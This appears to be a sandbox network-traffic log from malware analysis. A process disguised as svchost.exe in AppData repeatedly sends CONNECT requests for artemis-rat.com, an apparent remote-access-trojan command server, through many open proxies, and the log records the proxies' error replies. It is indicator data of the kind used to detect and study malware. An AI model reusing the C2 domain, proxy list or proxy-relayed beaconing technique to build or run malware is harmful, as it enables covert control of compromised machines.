                                                                                    Mar 9, 2024 13:14:30.733989954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2549192.168.2.558532202.159.35.15344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.735546112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2550192.168.2.558535202.159.35.15344343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.736737013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2551192.168.2.558329103.23.100.1414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.742144108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2552192.168.2.558374103.113.71.230312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.747987986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.567514896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.546503067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.380662918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.101062059 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2553192.168.2.5583268.222.164.2051567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.755635023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2554192.168.2.558278122.114.232.13780843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.801714897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2555192.168.2.555401148.72.206.84253643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.802691936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646287918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2556192.168.2.55838591.189.177.190312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.802699089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.122859955 CET1286INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/5.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3628
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from lb1
                                                                                    X-Cache-Lookup: NONE from lb1:3128
                                                                                    Via: 1.1 lb1 (squid/5.7)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2557192.168.2.558402185.225.232.1918043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.807481050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.123697996 CET805INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: Apache/2.4.57 (Debian)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2558192.168.2.555479132.148.245.1123811743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.809542894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2559192.168.2.55835543.128.107.251888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.816438913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.183969975 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2560192.168.2.558330193.151.130.114808643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.819837093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2561192.168.2.55841939.105.27.30312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.820204020 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:31.151813030 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2562192.168.2.558412120.78.191.688043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.820369005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.160962105 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2563192.168.2.55843615.236.106.236312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.820733070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.117916107 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2564192.168.2.558122117.160.250.163999943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:30.820966005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.419142008 CET221INHTTP/1.1 403 Access Denied
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Connection: close
                                                                                    Cache-Control: no-store
                                                                                    Content-Type: text/html
                                                                                    Content-Language: en
                                                                                    Content-Length: 43
                                                                                    Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
